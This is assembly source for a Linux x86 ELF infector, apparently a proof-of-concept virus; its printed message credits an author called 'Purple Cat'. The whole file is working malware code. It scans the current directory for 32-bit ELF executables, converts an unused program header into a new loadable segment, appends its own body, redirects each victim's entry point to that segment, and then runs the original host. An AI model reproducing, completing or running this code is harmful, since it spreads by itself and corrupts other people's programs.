BITS 32
GLOBAL main
SECTION .text

system EQU 0x80
standart_output EQU 1
read_and_write EQU 2
SEEK_SET EQU 0
SEEK_CUR EQU 1
SEEK_END EQU 2
new_line EQU 10

sys_exit EQU 1
sys_read EQU 3
sys_write EQU 4
sys_open EQU 5
sys_close EQU 6
sys_lseek EQU 19
sys_readdir EQU 89
sys_getcwd EQU 183

main:
pushad
pushfd
call Virus
popfd
popad
jmp Host

Virus:
Start:
pop eax
push eax

push ebp
mov ebp, esp
sub esp, 512

mov dword [ebp - 4], eax ;We have in [ebp - 4] the virtual address (delta offset) of the virus.

mov ecx, 256
lea ebx, [ebp - 256]
mov eax, sys_getcwd
int system

xor edx, edx
xor ecx, ecx
lea ebx, [ebp - 256]
mov eax, sys_open
int system
test eax, eax
js Exit
mov dword [ebp - 8], eax ;We have in [ebp - 8] the handle of current path.
jmp Find_file

Exit:
jmp Payload

Close_file:
mov ebx, [ebp - 12]
mov eax, sys_close
int system

Find_file:
lea ecx, [ebp - 274]
mov ebx, [ebp - 8]
mov eax, sys_readdir
int system
test eax, eax
jz Exit

mov ecx, read_and_write
lea ebx, [ebp - 264]
mov eax, sys_open
int system
test eax, eax
js Find_file
mov [ebp - 12], eax ;We have in [ebp - 12] the handle of the file we are going to check.

mov edx, 52
lea ecx, [ebp - 64]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
test eax, eax
js Close_file

mov eax, [ebp - 64]
cmp eax, 0x464C457F
jnz Close_file

mov eax, [ebp - 60]
cmp eax, 0x00010101
jnz Close_file

mov ax, [ebp - 48]
cmp ax, 0x0002
jnz Close_file

mov eax, [ebp - 46]
cmp eax, 0x00010003
jnz Close_file

Infect_file:
mov cx, [ebp - 20]
test cx, cx
jz Close_file

mov eax, [ebp - 40]
mov [ebp - 16], eax ;We have in [ebp - 16] the entry point of the program.

and ecx, 0x0000FFFF
mov ebx, [ebp - 36]
mov [ebp - 20], ebx ;We have in [ebp - 20] the offset of the first program header.

Check_ph:
push ecx

mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov edx, 32
lea ecx, [ebp - 52]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
cmp dword [ebp - 52], 6
jz Unused_ph

add dword [ebp - 20], 32
pop ecx
loop Check_ph

jmp Close_file

Unused_ph:
mov edx, SEEK_END
mov ecx, 0
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov [ebp - 24], eax ;We have in [ebp - 24] the size of the file.

mov edx, End_virus - main
mov ecx, [ebp - 4]
sub ecx, 7
mov ebx, [ebp - 12]
mov eax, sys_write
int system

mov edx, SEEK_SET
mov ecx, [ebp - 24]
add ecx, 10
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 16]
sub eax, 0x2000000E
sub eax, [ebp - 24]
mov [ebp - 28], eax

mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 24]
add eax, End_virus - main

mov dword [ebp - 56], 0x00000001
mov dword [ebp - 52], 0x00000000
mov dword [ebp - 48], 0x20000000
mov dword [ebp - 44], 0x20000000
mov dword [ebp - 40], eax
mov dword [ebp - 36], eax
mov dword [ebp - 32], 0x00000007
mov dword [ebp - 28], 0x00001000

mov edx, 32
lea ecx, [ebp - 56]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

mov edx, SEEK_SET
mov ecx, 24
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system

mov eax, [ebp - 24]
add eax, 0x20000000
mov dword [ebp - 28], eax

mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system

jmp Close_file

Payload:

mov dword [ebp - 76], 'Hi, '
mov dword [ebp - 72], 'this'
mov dword [ebp - 68], ' is '
mov dword [ebp - 64], 'a pr'
mov dword [ebp - 60], 'oof '
mov dword [ebp - 56], 'of c'
mov dword [ebp - 52], 'once'
mov dword [ebp - 48], 'pt v'
mov dword [ebp - 44], 'irus'
mov dword [ebp - 40], ', by'
mov dword [ebp - 36], ' Pur'
mov dword [ebp - 32], 'ple '
mov dword [ebp - 28], 'Cat:'
mov dword [ebp - 24], ' pur'
mov dword [ebp - 20], 'ple-'
mov dword [ebp - 16], 'cat@'
mov dword [ebp - 12], 'hotm'
mov dword [ebp - 8], 'ail.'
mov dword [ebp - 4], 'es' + new_line*256*256

mov edx, 75
lea ecx, [ebp - 76]
mov ebx, standart_output
mov eax, sys_write
int system

leave
ret

End_virus:

Host:
mov edx, 21
mov ecx, Host_message
mov ebx, standart_output
mov eax, sys_write
int system

mov eax, sys_exit
int system

SECTION .data
Host_message db "The host is running!", new_line